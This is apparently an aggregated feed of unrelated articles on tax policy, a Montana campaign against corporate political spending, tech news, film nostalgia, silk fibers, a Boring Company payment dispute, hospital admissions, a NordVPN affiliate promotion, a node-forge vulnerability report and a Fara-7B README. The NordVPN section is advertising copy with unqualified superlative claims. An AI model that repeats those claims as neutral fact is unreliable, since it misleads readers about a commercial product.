The public has supported raising taxes on the ultrarich and corporations for years, but policymakers have not responded. Small increases in taxes on the rich that were instituted during times of Democratic control of Congress and the White House have been consistently swamped by larger tax cuts passed during times of Republican control. This was most recently reflected in the massive budget reconciliation bill pushed through Congress exclusively by Republicans and signed by President Trump. This bill extended the large tax cuts first passed by Trump in 2017 alongside huge new cuts in public spending. This one-step-forward, two-steps-back dynamic has led to large shortfalls of federal revenue relative to both existing and needed public spending.
Raising taxes on the ultrarich and corporations is necessary for both economic and political reasons. Economically, preserving and expanding needed social insurance and public investments will require more revenue. Politically, targeting the ultrarich and corporations as sources of the first tranche of this needed new revenue can restore faith in the broader public that policymakers can force the rich and powerful to make a fair contribution. Once the public has more faith in the overall fairness of the tax system, future debates about taxes can happen on much more constructive ground.
Policymakers should adopt the following measures:
Tax wealth (or the income derived from wealth) at rates closer to those applied to labor earnings. One way to do this is to impose a wealth tax on the top 0.1% of wealthy households.
Restore effective taxation of large wealth dynasties. One way to do this would be to convert the estate tax to a progressive inheritance tax.
Impose a high-income surtax on millionaires.
Raise the top marginal income tax rate back to pre-2017 levels.
Close tax loopholes for the ultrarich and corporations.
...
Between 2008 and 2024, reported “independent” expenditures by outside groups exploded by more than 28-fold — from $144 million to $4.21
billion
. Unreported money also skyrocketed, with dark money groups spending millions influencing the 2024 election.
Most people I talk with assume that the only way to stop corporate and dark money in American politics is either to wait for the Supreme Court to undo
Citizens United
(we could wait a
very
long time) or amend the U.S. Constitution (this is extraordinarily difficult).
But there’s another way! I want to tell you about it because there’s a good chance it will work.
It will be on the ballot next November in Montana. Maybe you can get it on the ballot in your state, too.
Here’s the thing: Individual states — either through their legislators or their citizens wielding ballot initiatives — have the authority to limit corporate political activity and dark money spending, because they determine what
powers
corporations have.
In American law, corporations are creatures of state laws. For more than two centuries, the power to define their form, limits, and privilege has belonged only to the states.
In fact, corporations have no powers at all until a state government grants them some. In the 1819 Supreme Court case
Trustees of Dartmouth College v. Woodward,
Chief Justice John Marshall established that:
“A corporation is an artificial being, invisible, intangible, and existing only in contemplation of law. Being the mere creature of law, it possesses only those properties which the charter of its creation confers upon it, either expressly, or as incidental to its very existence….The objects for which a corporation is created are universally such as the government wishes to promote. They are deemed beneficial to the country; and this benefit constitutes the consideration, and, in most cases, the sole consideration of the grant.”
States don’t
have
to grant corporations the power to spend in politics. In fact, they could decide
not
to give corporations that power.
This isn’t about corporate
rights
, as the Supreme Court determined in
Citizens United
. It’s about corporate
powers.
When a state exercises its authority to define corporations as entities
without
the power to spend in politics, it will no longer be relevant whether corporations have a
right
to spend in politics — because without the
power
to do so, the right to do so has no meaning.
Delaware’s corporation code already declines to grant private foundations the power to spend in elections.
Importantly, a state that no longer grants its corporations the power to spend in elections
also
denies that power to corporations chartered in the other 49 states, if they wish to do business in that state.
All a state would need to do is enact a law with a provision something like this:
“Every corporation operating under the laws of this state has all the corporate powers it held previously,
except
that nothing in this statute grants or recognizes any power to engage in election activity or ballot-issue activity.”
Sound farfetched? Not at all.
IIn Montana, local organizers have drafted and submitted a constitutional initiative for voters to consider in 2026 — the first step in a movement built to spread nationwide. It would decline to grant to all corporations the power to spend in elections.
Called the
Transparent Election Initiative
, it wouldn’t
overturn
Citizens United
— it would negate the
consequences
of
Citizens United
....
Note to governors and state legislators: The
Citizens United
decision is enormously unpopular. Some
75 percent
of Americans disapprove of it. But most of your governors and state legislators haven’t realized that you have the authority to make
Citizens United
irrelevant. My recommendation to you:
Use
that authority to rid the nation of
Citizens United
.
The Montana Plan, a breakthrough legal strategy, will stop corporate and dark money cold. It's how Montanans will beat
Citizens United
and take back our politics. Learn about what it is and how it's headed toward Montana's 2026 ballot. Montana can do it, and your state can too!
What is The Montana Plan?
The Montana Plan uses the States authority to define what powers corporations get and stops giving them the power to spend in our politics. Montana can do it, and your state can too! Learn how!
A Power Move
For more than a century, Montana, like every state, has given all corporations the power to do everything legal. Turns out, we don't have to do that.
It's Up to Us
States don't have to give corporations the power to spend in politics. So The Montana Plan simply stops granting that power.
Bypasses Citizens United
Citizens United
held that corporations had a right to spend in politics. But if a corporation doesn't have the power to act, that right can't be used. That makes
Citizens United
irrelevant.
How Montana Can Act
Montana's laws include three powerful provisions that give us a clear path toward keeping corporations out of our politics:
1 Power to Alter or Revoke
Montana law explicitly allows the state to change or repeal its corporate code at any time, for any reason. No corporation has a permanent claim to any power—or to existence!
2 Universal Application
Changes to Montana's corporation law apply to all corporations—new and existing alike. Every corporation can be redefined by rewriting the law behind it.
3 Out-of-State Corporation Limits
Montana plays fair: Out-of-state corporations can only exercise the same powers here that Montana corporations have. If Montana corporations can't spend in our politics, neither can they.
Together, these provisions mean Montana has full authority to no longer grant corporations the power to spend in our politics—across the board, and for good. We'll need your help. The Transparent Election Initiative is spearheading a ballot initiative that gives Montana voters the ability to implement The Montana Plan. Volunteer, engage, and sign the petition when ready!
Out of nowhere,
Google brought cross-platform AirDrop support
to the Pixel 10 this week, allowing the company’s latest lineup of flagships to safely and securely send photos, files, and more to the iPhone. While it initially seemed like this was a rogue move made by Google to coerce Apple into another boundary-breaking decision, it might actually be part of the repercussions that also led to USB-C on iPhone and the adoption of RCS.
If you’ve been scratching your head trying to figure out just
how
— not to mention
why
— Google was able to get this up and running, the answer might be a little more simple than you could think. While this certainly brought back memories of, say, Beeper’s attempt at getting iMessage up and running on Android two years ago, as well as Palm’s war of attrition on iTunes support in the earliest days of the Pre, it sounds like this particular example was far less hostile towards Apple than any of its predecessors, all thanks to some of the changes made by the EU.
As reported by
Ars Technica
, the answer to this week’s mysterious Quick Share upgrade lies in the EU’s interoperability requirements designed for the DMA. The ruling out of the European Commission pushed Apple to begin supporting interoperable wireless standards beginning with this year’s set of OS upgrades, replacing the previous proprietary standard the company used to power its various Continuity features. That forced Apple to add support for the Wi-Fi Alliance’s Wi-Fi Aware standard of multi-directional file sharing, at the cost of completely phasing out its previous walled-in protocol.
So yes, while Apple wasn’t officially involved with opening up AirDrop clients to Android, it’s a little unfair to paint this company as having no involvement at all. Thanks to actions Apple was required to make under the DMA in Europe, Pixel 10 users — and soon, Android users at large — now have effectively native AirPlay support through Quick Share without any sacrifice to security, so long as the hardware has proper support for Wi-Fi Aware.
Still, just because this isn’t the quiet workaround some of us might’ve assumed Google was relying on doesn’t mean you should expect Apple to join in on the fun any time soon. As
Ars Technica
points out in its report,
Europe has been rethinking
its heavy-handed approach to tech firms, specifically in reaction to the absence of AI-centric firms in the region — and Apple, for its part, still wants the DMA revoked.
Try out AirDrop while your phone still supports it
, Pixel 10 owners. While it seems unlikely, you never know if this could disappear overnight.
FTC: We use income earning auto affiliate links.
More.
Why 90s Movies Feel More Alive Than Anything on Netflix
I was rewatching The Silence of the Lambs the other night, and something hit me hard. This movie, made in 1991, feels more alive, more gripping, more
real
than most things coming out today. And it got me thinking: why do 80s and 90s movies seem so much better than what we're getting now?
There's something about the way older films were crafted that modern cinema seems to have lost. Take Goodfellas from 1990. Scorsese doesn't just tell you a story about mobsters, he pulls you into their world. The tracking shot through the Copacabana, the narration that feels like a conversation, the way violence erupts suddenly and brutally. You feel the seduction of that lifestyle and the paranoia that comes with it. Every frame has purpose. Every scene builds character. Compare that to The Irishman from 2019, which is actually good but feels bloated, overly long, relying too heavily on “de-aging” technology that never quite convinces you.
Or think about Pulp Fiction from 1994. Tarantino took narrative structure and shattered it into pieces, then reassembled it into something that shouldn't work but does, brilliantly. The dialogue crackles. The characters feel lived-in. Vincent and Jules aren't just hitmen, they're more like philosophers debating foot massages and divine intervention between murders. Now look at something like Bullet Train from 2022. It's stylish, sure, but it feels like it's trying too hard to be quirky. The characters are archetypes. The dialogue is clever for cleverness' sake. It's entertaining in the moment but fades away from your memory almost immediately.
Even The Silence of the Lambs itself proves the point. Every interaction between Clarice and Hannibal is a chess match. You feel her vulnerability, his intelligence, the way he gets under her skin. The horror isn't in jump scares, it's in the psychological warfare. Modern thrillers like The Woman in the Window from 2021 have twists and atmosphere, but they lack that deep character work that makes you actually care what happens.
I think the difference comes down to this: older movies took risks. They trusted audiences to pay attention, to feel something, to think. Scorsese and Tarantino had visions and the freedom to execute them without endless studio interference. They weren't chasing demographics or worrying about franchise potential. They were making
films
, not products.
Today's cinema often feels designed by committee, optimized for streaming algorithms and opening weekend numbers rather than lasting impact. We have better technology, way bigger budgets, more sophisticated effects, but somewhere along the way, we forgot that movies are supposed to move us, not just occupy our time between scrolling sessions.
Maybe I'm just nostalgic. Maybe I'm romanticizing the past. But when I finish a good movie, I can sit there thinking about them for hours, even days depending on the movie. When I finish most modern blockbusters, I'm already thinking about dinner. And that difference, I think, says everything.
Inspired by Spider-Man, scientists recreate web-slinging technology
We all have moments as kids watching Spider-Man and imagining what it might feel like to shoot a thread into the air and have it grab something, bringing it closer. A group of
researchers
at Tufts University has moved that idea from comic panels into the lab. Their new work shows a fluid silk material that shoots from a needle, solidifies mid-air, sticks to objects, and can lift items far heavier than itself.
The whole story began with silk, not the kind spiders spin, but the silk taken from moth cocoons, which are boiled down into their basic protein building blocks known as fibroin. The silk fibroin solution can be pushed through narrow-bore needles to make thin threads, and when exposed to solvents like ethanol or acetone, it slowly starts turning into a semi-solid hydrogel.
The problem is that this transformation usually takes hours. Spider silk hardens almost instantly as it leaves the glands, which gives spiders the precise control that engineers have struggled to match.
Then a little accident helped make a breakthrough. “I was working on a project making extremely strong adhesives using silk fibroin, and while I was cleaning my glassware with acetone, I noticed a web-like material forming on the bottom of the glass,”
said
Marco Lo Presti, research assistant professor at Tufts.
It turned out that dopamine, a key component they were already using for adhesive work, dramatically sped up the solidification process. When dopamine is mixed into the solution, it appears to pull water away from the silk proteins, so the liquid fibroin doesn’t need hours to set. Instead, once it meets the organic solvent, it snaps into a fiber in just seconds.
From there, the team built a coaxial needle system where the fibroin–dopamine solution moves through the center while a layer of acetone flows around it. As the stream leaves the nozzle, the acetone triggers rapid solidification and then evaporates in mid-air, allowing the forming fiber to latch onto objects it makes contact with. What comes out is a thread that can shoot through open air, stick on contact, and hold surprising amounts of weight.
To boost performance, the team mixed fibroin–dopamine solution with
chitosan
, a material derived from
insect
exoskeletons, which increased tensile strength up to 200 times. A
borate buffer
made the fibers roughly eighteen times stickier. Depending on the needle bore, the resulting fiber diameter can be as thin as hair or closer to half a millimeter.
In testing, the demonstrations took on a
playful look
as the fibers picked up a cocoon, a steel bolt, a tube floating on water, a scalpel half-buried in sand, and even a block of wood from around 12 centimeters away. Under various conditions, the fibers can lift objects more than 80 times their own weight. For a jet of liquid silk that hardens mid-air, that lifting strength is remarkable.
Silk solution jets solidify into fibers that stick to and lift multiple steel bolts from a sand-filled petri dish. (Marco Lo Presti, Tufts University)
Spiders don’t actually shoot their silk into the air. They make contact with a surface first, attach a strand, then pull and arrange their webs with careful choreography. As Lo Presti
explained
, “Spiders cannot shoot their web… we are demonstrating a way to shoot a fiber from a device, then adhere to and pick up an object from a distance. Rather than presenting this work as a bio-inspired material, it’s really a superhero-inspired material.”
Natural spider silk is still about a thousand times stronger than the man-made fiber in this study, but the method opens a path for controlled shooting, instant solidification, and strong adhesion. With further innovations, it could grow into something far more capable and find its place in many different technological applications.
“We can be inspired by
nature
. We can be inspired by comics and science fiction. In this case, we wanted to reverse engineer our silk material to behave the way nature originally designed it, and comic book writers imagined it,”
said
Fiorenzo Omenetto, Frank C. Doble Professor of Engineering at Tufts University and director of the Silklab.
Willie Shane broke the asphalt on Elon Musk’s Music City Loop project this summer. Seven of his crew had been the sole excavators, fabricators and dump trucking company on The Boring Company’s proposed tunnel through Nashville for months.
Then came Monday night, when they walked off the site.
“I moved the equipment myself,” Shane said in an interview with the
Banner
on Tuesday.
“We were really skeptical from the beginning, and then since then, things pretty much just went downhill,” he added.
Musk’s company has
a spotty record of completing similar tunnels in other cities
, often snagging on government regulations and contractual issues. When Shane’s company, Shane Trucking and Excavating, which works with major local clients like the Grand Ole Opry and the Nashville International Airport, was approached by The Boring Company, he said he had some reservations.
“I told them very bluntly — and I don’t want this to come across like egotistical — but I told them, ‘Hey, my dad worked really hard to build a reputation in Nashville, and my brother and I work very hard to keep that reputation,’” Shane said. “If you guys are actually serious about doing this, you need to be 100 percent serious, because this is going to be our reputation as part of this too.”
After being reassured, Shane’s team took the job in July.
He and his crew left the state-owned property on Rosa L Parks Boulevard, where they had been working on the proposed 9-mile tunnel from the state capitol to the airport after months of safety and financial issues with Musk’s company.
It started about a month in with a change in pay.
“We were supposed to be paid every 15 days. And then they switched accounting firms, and then it went from 15 days to 60,” Shane said. Now it’s been 123 days since they started digging, and Shane says The Boring Company has only paid out about five percent of what he’s owed.
According to Shane, he has still been able to pay his employees on time, but the local trucking company is left holding the bag for money unpaid by The Boring Company. Other subcontractors, he says, have also severed ties due to nonpayment on the project.
The final straw that caused Shane to pull his crew from the site was when multiple employees reported that a representative of The Boring Company was soliciting them to bail on Shane and work directly for TBC on Monday.
“One of their head guys texts two of my welders, offering them a job for $45 an hour from his work phone,” Shane described, noting that the same TBC employee denied sending the texts when confronted with screenshots. “That’s actually a breach of contract.”
Shane also says he and other vendors have filed multiple OSHA safety complaints since working on the site but have gotten no response. His biggest concerns have been Boring employees on the jobsite not wearing proper personal protective equipment, such as hard hats, and unsafe shoring, which he says he’s repeatedly complained about to the Boring Company.
“Where we’re digging, we’re so far down, there should be concrete and different structures like that to hold the slope back from falling on you while you’re working,” Shane explained. “Where most people use concrete, they currently have — I’m not even kidding — they currently have wood. They had us install wood 2x12s.”
The safety concerns are why Shane says he decided to make the issue public.
“We’re not coming forward in like a vindictive way,” Shane said. “I just don’t want someone to get hurt, sure, and then, in the future, I have to be like, ‘Dang, I worked on there, and I turned a blind eye to it.’”
In the meantime, Shane said that the amount of backpay owed to his company is in the six figures and that he has retained a lawyer.
Boring Company response
After the
Banner
contacted The Boring Company about Shane’s claims, Vice President David Buss said he connected with Shane and would make good on the outstanding invoices by the end of the day Wednesday and would do a “full audit” on the error.
“It does look like we had some invoicing errors on that,” Buss told the
Banner
. “It was, you know, unfortunately, too common of a thing, but I assured them that we are going to make sure that invoices are wired tomorrow.”
Buss later clarified that he does not believe The Boring Company has a “common” practice of missing payments to vendors, but rather missed payments happen sometimes during “the normal course of business.”
“You hate to have an unhappy vendor. We certainly aim to have great relationships,” Buss said. “And so my goal will be to figure out what happened in this incident and then make sure that that’s not extrapolated to any other incidents.”
Buss also said he was looking into Shane’s claims about The Boring Company trying to hire contractors.
“It is definitely not our practice to try to poach anybody, so I understand the frustrations on their side,” Buss said. “Hopefully it’s something where we’re able to smooth that over and correct some of the things that happened on site and that led to this.”
Asked about the safety complaints, Buss said Shane did not raise any concerns on their call Tuesday and said he was unaware of any OSHA complaints, but would look into it.
“Safety is existential to our company,” Buss said. “We thankfully have a long history of seven years of tunneling in Las Vegas, and we’ve had one construction-related injury that was not the company’s fault in a violation.”
Hiring headaches
According to Buss, the projected timeline had not changed, and work had not been slowed by the crews’ departure from the site. Shane, however, painted a different picture.
“Actually, we were the crew that was building the tunnel boring machine. So there’s nobody building the tunnel boring machine right now, and the Boring Company has been trying to hire welders, but they haven’t been able to secure any help,” Shane said Tuesday, noting that many prospective employees won’t work on the project because of Musk’s reputation.
“A lot of people don’t like Elon and their payment terms; the way that they pay their employees, is not traditional,” Shane said.
Buss denied any hiring trouble.
“We’ve had zero issues finding great talent thus far in Nashville,” Buss said. “I think we’ve hired about 14 people now, and we’re going to start to grow the team as we begin mining operations.”
As reports of a second Boring tunnel under Broadway and West End surfaced, Boring Company CEO Steve Davis hosted a two-hour live update session on X, the social media website also owned by Musk Monday evening, in which he touted progress on the Music City Loop and described the project as smoothly underway, with boring set to begin around January after the proper permits are secured.
An hour later, Shane’s team left the site.
During Davis’ virtual meeting, members of the public could submit questions, some of which were answered by Boring Company leadership. Many of those questions came from State Sen. Heidi Campbell (D-Nashville), who represents the area and has been a vocal critic of the project since it was announced.
“I would say the promotional session that they had last night on on Twitter was disingenuous at best, if not dishonest, because it was, it sounded like a utopian project and then, lo and behold, the very next day, we find out that there are people leaving the site because they’re not getting paid and they’re not being treated well,” Campbell told the
Banner
.
In addition to her concerns about irreparable damage to the site and whether the project would even be completed, Campbell said she was concerned about the state’s liability if there were unsafe working conditions on the leased property and whether there was any way for lawmakers to stop the process.
“There is nothing to hold The Boring Company accountable for any of these things,” Campbell said of the lease. “They’ve already dug a big hole. But then on top of it, if they move forward, forward in any capacity, they have not proven that they are reliable to take care of the damage that they cause.”
When Shane first spoke to the
Banner
, he said he did not intend to return to the job even if they received payment, noting that his employees had expressed discomfort “because they didn’t feel the management there was very good.”
Hours later, after hearing from Buss, Shane said he would consider returning “if they correct the situation on their end.”
Demetria Kalodimos contributed to this report
.
The most male and female reasons to end up hospital
The first post I wrote for this blog was about
people being injured by dogs
. Specifically, how much of this goes on, and what counts as a lot.
We can measure this reasonably well in England, because the health service publishes annual data for
hospital admissions
showing what people were admitted
for
.
This often includes not just the physical condition that needed treatment, but the event that led to that condition in the first place. So not just the tissue damage on someone’s hand, in other words, but the story of a dog bite behind it.
These second-order reasons for admission—known as “external causes”—cover a whole world of horrible mishaps beyond the ones that I looked at last time. The data also records whether the patient was male or female, so I wondered what the
most male
and
most female
external causes might be.
To cut to the chase, here they are.
When I began the crunching that produced these numbers, I’d given no thought at all to what I would find. If I had, it would have been obvious that pregnancy would top the charts on the female side.
But I don’t think I could have imagined what a stark dossier of male and female stereotypes I was compiling. Because to me, the chart above basically says that violence, physical labour, sport and machines are the most typically male ways to end up in hospital, while pregnancy, beauty and animals and mental health are the most typically female.
I’m having to choose my words carefully, because I need to stress one thing:
these are not the most common reasons for men and women to be admitted to hospital
. They are the most
typically male
and
typically female
.
So only about 400 men in the whole of England go to hospital after falls from scaffolding each year. But that cause is at the top of the chart because it is the reason for admission that’s most male-dominated—just as the various pregnancy-related reasons are the most female. (I’ve put the total number of admissions in the column on the right, to give an actual sense of scale.)
In practice, I’d guess that these causes are the things that men or women do more often, or more dangerously.
Some minor points: I excluded all the external causes with less than 1,000 admissions in the last three years, so everything you see here happens at least fairly frequently, and amounts to a reasonable sample. I also excluded a small number of admissions (less than half a percent) that are classified “Gender Unknown”.
Some of the external causes have
very longwinded names
, so I’ve made them as simple as possible. “Agents primarily acting on smooth and skeletal muscles and the respiratory system” is especially unenlightening, although I suspect it might have something to do with Botox.
In the next few days I plan to upload all the data in a searchable table (if I can make that work) so you can explore it in other ways too.
NordVPN Black Friday Deal: Unlock 77% off VPN plans in 2025
Bleeping Computer
www.bleepingcomputer.com
2025-11-26 20:00:37
The NordVPN Black Friday Deal is now live, and you can get the best discount available: 77% off that applies automatically when you follow our link. If you've been waiting for the right moment to upgrade your online security, privacy, and streaming freedom, this is the one VPN deals this Black Frida...
Want one of the best VPN discounts of 2025? This NordVPN Black Friday deal gives you the fastest VPN with strong digital security and US Netflix access – all at an unbeatable price.
NordVPN Black Friday Deal: Unlock up to 77% off VPN plans in 2025
The
NordVPN Black Friday Deal
is now live, and you can get the best discount available: 77% off that applies automatically when you follow our link. If you’ve been waiting for the right moment to upgrade your online security, privacy, and streaming freedom, this is the one VPN deal we can guarantee will have you smiling all year round.
There’s no better time to buy a VPN than Black Friday or Cyber Monday. You get the same premium VPN that costs more at any other time of year, but at a fraction of the price. What’s more, if you grab a 1-year, 2-year plan, or even a 3-year plan right now, your renewal will fall during Black Friday. That means you’ll be able to hunt for another discount each time you need a VPN subscription.
So, why NordVPN? Besides having one of the best discounts, NordVPN ranks as the fastest VPN thanks to its NordLynx protocol (WireGuard fork). Fast VPN speeds make Nord perfect for Netflix access, HD streaming, gaming, and torrenting.
It enforces a strict no-logs policy, offers powerful Threat Protection Pro, and bundles valuable extras like NordPass, NordLocker, and NordProtect (Identity Theft Protection) for better everyday protection online.
NordVPN offers a more comprehensive privacy suite. Plus, with a 30-day money-back guarantee, you can try it risk-free while the discount lasts. If you want the biggest NordVPN savings of 2025, Black Friday is the perfect time to act.
NordVPN: The best Black Friday deal of 2025
The top promo this year is
NordVPN’s 2-year plan
. It is available with a massive 77% discount plus three extra months free. Best of all?
NordVPN’s Black Friday pricing
immediately surpasses VPN promotions advertised by competing providers.
In 2025, NordVPN confirmed that its Black Friday and Cyber Monday promotion runs from October 16 through December 10. That gives you nearly two months to grab the most impressive VPN deals of 2025.
Here’s what NordVPN had to say:
"Black Friday is a busy time — and not just for shoppers. Cybercriminals are also highly active during this period, so remember to take the necessary steps to protect yourself online. NordVPN protects your online traffic with encryption, making you safer on every network and device."
Get the discount – with no strings attached
When you follow the link in this article, the Black Friday deal will activate automatically – no codes or hoops to jump through.
The deal brings the total down to just $80.73 for 27 months of NordVPN Basic.
To put that into perspective, the regular subscription costs $12.99 per month, which means you’d normally pay $77.94 for just six months of VPN protection.
With this Black Friday deal, you’re getting well over two years of protection, unbeatable streaming access on vacation, and some of the best online security tools we have ever tested – for a fraction of the usual cost.
This is exactly why NordVPN’s Black Friday bundle is turning heads across the VPN industry. And why it’s easily the most competitive VPN offer we’ve managed to land on this season.
NordVPN’s Black Friday deals means you’ll get security, privacy, Netflix access, and WiFi privacy at the lowest cost.
NordVPN bundle deals
NordVPN
didn't stop at its Basic plan this Black Friday. The leading privacy provider has also slashed prices across its premium bundles. This gives you access to the Ultimate Nord Security ecosystem at prices we’ve never seen outside the Black Friday window.
NordVPN Plus
The first standout option for bargain hunters seeking better all-around protection is the NordVPN Plus subscription.
This plan includes full VPN access, Threat Protection Pro (an always‑on security layer that blocks malware, phishing websites, intrusive ads, and trackers in real time, even when the VPN is disconnected), and Nord’s secure password manager.
This Black Friday, you can get this all bundled for just $3.89 per month: turning a standard VPN subscription into a full-blown online security suite, at a price point that beats most competitors' basic plans.
If you’re looking for an online protection suite with reliable filtering against trackers, ads, and malware, NordVPN delivers exactly that. It also includes a top-tier password manager that helps secure your accounts against hackers and phishing.
What’s more, NordVPN’s pricing is unusually generous for the amount of protection you get. It’s genuinely rare to find such a comprehensive security bundle at a cost that beats what most providers charge for the VPN alone.
NordVPN Ultimate
Hunting for the ultimate VPN deal of the year? NordVPN’s “Ultimate” plan is the centerpiece of its 2025 Black Friday event.
Normally valued at $626.13, the 27-month Ultimate plan is currently discounted to just $159. That works out to $5.89 per month, which is a massive 77% price cut.
Ultimate includes every service and feature that Nord Security offers. You get unlimited VPN use, the password manager, upgraded anti-malware and anti-tracking tools, 1TB of encrypted cloud storage, and even $5,000 in scam loss insurance through NordProtect. Just bear in mind that insurance is only available to US residents.
When you consider that Google charges $5 per month for just 1TB of cloud storage, Nord’s Black Friday pricing really comes out swinging! For only 89 cents more, you’ll get cloud storage
plus
a VPN, password manager, advanced threat filtering, and identity theft protection.
For anyone looking to build a full security stack at the lowest possible cost, these Black Friday bundles are among the strongest tech deals of the year.
Which VPN features does NordVPN come with?
No matter whether you choose NordVPN Basic, Plus, or Ultimate, you'll get full access to NordVPN’s complete VPN feature set. All core tools, including global server options, VPN protocol options, privacy settings, and security features, remain identical across all plans.
The higher-tier bundles simply add extra services such as password management, advanced threat filtering, encrypted cloud storage, and identity protection.
That means you can stick with NordVPN Basic if all you want is a powerful, fast, and fully featured VPN. The upgrades are optional add-ons and will not change how the VPN itself performs.
Full NordVPN feature list:
Strong encryption of all traffic
(AES‑256 with modern VPN protocols like NordLynx/
WireGuard
, OpenVPN, and IKEv2 for both security and speed).
Protection against ISP or network surveillance
by hiding all browsing activity inside an encrypted tunnel.
IP address masking
so websites and services see the VPN server’s IP instead of your real one, improving privacy and helping avoid IP‑based tracking.
Location spoofing
lets you choose from thousands of servers in 127+ countries, useful for
bypassing geo‑restrictions
and regional blackouts.
Ad blocking
at the server level to strip many ads before they reach your device (via Threat Protection/Threat Protection Pro).
Tracking prevention
by blocking common tracking domains and cookies so advertisers and analytics tools collect less data on you.
Malicious site blocking
that stops connections to known phishing, malware, and scam domains before they load.
Malware download scanning
(on supported desktop apps) that checks downloaded files.
MultiHop VPN routing (Double VPN)
, sending your traffic through two VPN servers with two layers of encryption for extra anonymity in high‑risk situations.
Tor over VPN
sends your traffic first through the VPN and then into the
Tor network
for stronger identity protection on .onion sites.
Automatic
kill switch
that cuts your internet connection if the VPN drops, preventing any data from leaking outside the encrypted tunnel.
DNS leak protection
by forcing all DNS lookups through NordVPN’s own DNS resolvers, so your ISP cannot see what domains you visit.
Obfuscated servers
(NordWhisper / obfuscation) to hide the fact that you are using a VPN. Useful to connect on restrictive networks and to use the VPN in high-censorship countries.
P2P‑optimized servers
for safer torrenting and other peer‑to‑peer traffic without sacrificing too much speed.
Streaming‑optimized servers
(SmartPlay) that automatically use working DNS/routes to access major streaming platforms when they try to block VPN IPs.
Split tunneling
(on supported apps) so you can choose which apps use the VPN and which go directly to the internet—for example, routing only your browser through the VPN while games or banking apps use a normal connection.
Private DNS servers
operated by NordVPN instead of your ISP’s DNS, reducing data exposure and some forms of DNS‑based censorship.
High‑speed connections
(including 10 Gbps locations and NordLynx) to minimize the performance hit usually associated with VPNs.
Support for up to 10 simultaneous devices
under one subscription, so you can cover multiple personal devices or family members at once.
Optional dedicated IP addresses
so you can get a consistent IP (useful for hosting, remote access, avoiding CAPTCHA, and accessing strict streaming accounts).
Native apps for Windows,
macOS
, Linux, Android, iOS/iPadOS, Android TV
, and many
smart TVs
, Amazon Fire TV/Firestick, Apple TV, and Apple Vision (via native/tvOS/visionOS support).
Browser extensions
(proxy-based protection) for Chrome, Firefox, and Microsoft Edge.
Why NordVPN is the standout Black Friday VPN deal of 2025
NordVPN
is one of the most trusted VPN brands on the market, and its Black Friday and Cyber Monday deals make 2025 the perfect time to lock in long-term savings.
The service is headquartered in privacy-friendly Panama, a location that puts it well out of reach of data-hungry jurisdictions like the US, the UK, and the EU. Thanks to Panama's lack of mandatory data retention laws, NordVPN can maintain a
strict no-logging policy
. That means Nord has no records of your activities, even if the government comes knocking with a warrant.
Add to this its wide feature set and excellent third-party audit results, and you can see why NordVPN continues to stand out as one of the best value VPN options for netizens who care about strong privacy and watertight online security.
With the NordVPN Black Friday Deal, you will get access to all the premium features that helped NordVPN earn its reputation. This includes its NordLynx protocol (built on WireGuard to make NordVPN the
fastest VPN
), advanced encryption, and reliable privacy settings for users in countries where surveillance and censorship are a part of daily life.
Fully optimized for streaming
When it comes to streaming, NordVPN is exceptional. During our tests, its international network successfully accessed
multiple Netflix regions
, Hulu, HBO Max, Disney+,
Prime Video
, YouTube TV, DirecTV, SlingTV, BBC iPlayer, Joyn, Canal+,
Crave
, ESPN+, FOX, ABC, NBC, and Peacock.
And its fast connection speeds make it perfect for HD streaming without buffering, as well as for
gaming
, torrenting, and making video calls.
Does NordVPN have apps for all platforms?
Yes, NordVPN gives you comprehensive coverage for every gadget you own.
NordVPN provides custom apps for all major platforms (including Windows, macOS, iOS, Android,
Linux
, and Amazon Firestick), making it a practical, versatile option for households with mixed devices.
Each subscription supports up to 10
simultaneous connections
, allowing you to protect phones, tablets, laptops, smart TVs, and even school or work devices under one account.
With this year’s Black Friday pricing, NordVPN has turned one of the most polished premium VPNs on the market into a cheap VPN we can confidently recommend.
It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.
Learn how top leaders are turning investment into measurable impact.
Popular Forge library gets fix for signature verification bypass flaw
Bleeping Computer
www.bleepingcomputer.com
2025-11-26 19:32:42
A vulnerability in the 'node-forge' package, a popular JavaScript cryptography library, could be exploited to bypass signature verifications by crafting data that appears valid. [...]...
A vulnerability in the ‘node-forge’ package, a popular JavaScript cryptography library, could be exploited to bypass signature verifications by crafting data that appears valid.
The flaw is tracked as CVE-2025-12816 and received a high severity rating. It arises from the library’s ASN.1 validation mechanism, which allows malformed data to pass checks even when it is cryptographically invalid.
“An interpretation-conflict vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions,” reads the flaw's
description
in the National Vulnerabilities Database (NVD).
Hunter Wodzenski of Palo Alto Networks discovered the flaw and reported it responsibly to the node-forge developers.
The researcher warned that applications that rely on node-forge to enforce the structure and integrity of ASN.1-derived cryptographic protocols can be tricked into validating malformed data, and provided a proof-of-concept demonstrating how a forged payload could trick the verification mechanism.
A security advisory from the Carnegie Mellon CERT-CC explains that the impact varies per application, and may include authentication bypass, signed data tampering, and misuse of certificate-related functions.
“In environments where cryptographic verification plays a central role in trust decisions, the potential impact can be significant,”
CERT-CC warns
.
The impact may be significant considering that node-forge is massively popular with close to
26 million weekly downloads
on the Node Package Manager (NPM) registry.
The library is used by projects that need cryptographic and public-key infrastructure (PKI) functionality in JavaScript environments.
A fix was released earlier today in version 1.3.2. Developers using node-forge are advised to switch to the latest variant as soon as possible.
Flaws in widely used open-source projects
can persist for a long time
after their public disclosure and the availability of a patch. This may happen due to various reasons, the complexity of the environment and the need to test the new code being some of them.
Maybe it’s because my eyes are getting old or maybe it’s because
the contrast between windows
on macOS keeps getting worse. Either way, I built a tiny Mac app last night that draws a border around the active window. I named it “Alan”.
In Alan’s preferences, you can choose a preferred border width and colors for both light and dark mode.
Fara-7B: An Efficient Agentic Model for Computer Use
Overview
Fara-7B
is Microsoft's first
agentic small language model (SLM)
designed specifically for computer use. With only 7 billion parameters, Fara-7B is an ultra-compact Computer Use Agent (CUA) that achieves state-of-the-art performance within its size class and is competitive with larger, more resource-intensive agentic systems.
Try Fara-7B locally as follows (see
Installation
for detailed instructions):
vllm serve "microsoft/Fara-7B" --port 5000 --dtype auto
Then you can iterative query it with:
fara-cli --task "whats the weather in new york now"
Hint: might need to do
--tensor-parallel-size 2
with vllm command if you run out of memory
What Makes Fara-7B Unique
